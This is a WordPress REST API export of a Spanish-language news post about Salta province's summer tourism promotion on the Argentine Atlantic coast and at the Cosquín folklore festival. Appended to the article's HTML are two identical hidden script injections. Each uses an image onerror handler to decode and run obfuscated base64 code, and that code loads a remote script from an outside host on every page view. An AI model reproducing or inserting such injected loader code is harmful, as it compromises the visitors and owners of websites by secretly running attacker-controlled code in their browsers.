{"id":2098,"date":"2023-01-18T09:07:35","date_gmt":"2023-01-18T12:07:35","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2098"},"modified":"2025-08-14T00:25:15","modified_gmt":"2025-08-14T03:25:15","slug":"salta-realiza-una-intensa-promocion-turistica-durante-el-verano","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2098","title":{"rendered":"Salta realiza una intensa promoci\u00f3n tur\u00edstica durante el verano"},"content":{"rendered":"\n<h4 class=\"has-black-color has-text-color has-background wp-block-heading\" style=\"background-color:#f04e77\"><em>Con eje en la Costa Atl\u00e1ntica, el equipo de promoci\u00f3n tiene presencia en Mar del Plata y Pinamar y en los principales festivales de la temporada en el marco de la campa\u00f1a \u201cSalta una receta que no falla\u201d.<\/em><\/h4>\n\n\n\n<p>La Provincia es uno de los destinos m\u00e1s consolidados, el slogan Salta tan Linda que Enamora es el mejor posicionado en el pa\u00eds entre todos los destinos de Argentina; no obstante, en el marco de los lineamientos del Plan Liderar en materia de promoci\u00f3n se realizan acciones de promoci\u00f3n innovadoras en mercados estrat\u00e9gicos.<\/p>\n\n\n\n<p>\u201cSalta una receta que no falla\u201d es la campa\u00f1a de verano que el equipo de promoci\u00f3n nacional del Ministerio de Turismo y Deportes muestra en los principales destinos de la Costa Atl\u00e1ntica. La presencia activa de la provincia inici\u00f3 con la inauguraci\u00f3n del espacio federal de turismo el 11 de enero en Mar del Plata.<\/p>\n\n\n\n<p>Tambi\u00e9n en la Costa pero en la ciudad de Pinamar, entre el 11 de enero y el 21 de febrero Salta tendr\u00e1 presencia permanente en el espacio Norte Grande.<\/p>\n\n\n\n<p>Finalizando enero, en el Festival Nacional del Folklore que se realiza en Cosqu\u00edn, C\u00f3rdoba, nuevamente Salta tendr\u00e1 presencia destacada entre el 21 y el 29, apoyando especialmente a la Delegaci\u00f3n Salta el 25 de este mes.<\/p>\n\n\n\n<p>En febrero continuar\u00e1&nbsp;la promoci\u00f3n en la costa atl\u00e1ntica. El 2 de ese mes ser\u00e1 un d\u00eda especial para Salta en el Espacio Federal de Turismo en Mar del Plata. Tambi\u00e9n en esa ciudad, pero el 8 del pr\u00f3ximo mes, se har\u00e1 una presentaci\u00f3n de Destino en el Torre\u00f3n del Monje ante invitados especiales y medios de prensa especializados. En Pinamar desde el 9 de febrero y hasta el 12 ser\u00e1n D\u00edas de Salta en el Espacio Norte Grande.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-realiza-una-intensa-promocion-turistica-durante-el-verano-87323\" target=\"_blank\" rel=\"noopener\">\u00a0<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con eje en la Costa Atl\u00e1ntica, el equipo de promoci\u00f3n tiene presencia en Mar del Plata y Pinamar y en los principales festivales de la temporada en el marco de la campa\u00f1a \u201cSalta una receta que no falla\u201d. La Provincia es uno de los destinos m\u00e1s consolidados, el slogan Salta tan Linda que Enamora es [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2099,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-2098","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2098"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2098"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2098\/revisions"}],"predecessor-version":[{"id":7204,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2098\/revisions\/7204"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2099"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2098"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2098"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2098"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}